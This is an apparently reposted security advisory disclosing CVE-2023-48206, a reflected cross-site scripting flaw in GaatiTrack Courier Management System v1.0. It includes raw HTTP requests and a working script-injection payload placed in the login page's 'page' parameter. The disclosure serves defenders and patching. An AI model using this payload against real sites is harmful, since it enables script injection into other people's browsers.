GaatiTrack Courier Management System 1.0 Cross Site Scripting
2023-11-21 05:32:14 Author: cxsecurity.com(查看原文) 阅读量:9 收藏

GaatiTrack Courier Management System 1.0 Cross Site Scripting

# Exploit Title: GaatiTrack Courier Management System v1.0 - Multiple Cross-site scripting # Date: 12/112023 # Exploit Author: BugsBD Security Researcher (Rahad Chowdhury) # Vendor Homepage: https://www.mayurik.com/ # Software Link: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php # Version: v1.0 # Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56 # CVE: CVE-2023-48206 Description: Multiple reflected cross-site scripting (XSS) vulnerability exists in login.php, header.php page of GaatiTrack Courier Management System v1.0 that allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website login page parameter. Steps to Reproduce: 1. Go to login and capture request data using burp suite. Your request data will be: GET /gaatitrack/login.php HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp Upgrade-Insecure-Requests: 1 2. Now use XSS payload in login.php. So your request data will be: GET /gaatitrack/login.php?page=1</title><script>alert(document.domain)</script> HTTP/1.1 Host: 192.168.1.74 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: close Cookie: PHPSESSID=abl1dci7hob2f90sf5ag9k00mp Upgrade-Insecure-Requests: 1 3. Forward You request data and check browser. You will be popup with domain. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48206)



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


Copyright 2023, cxsecurity.com

文章来源: https://cxsecurity.com/issue/WLB-2023110017
如有侵权请联系:admin#unsafe.sh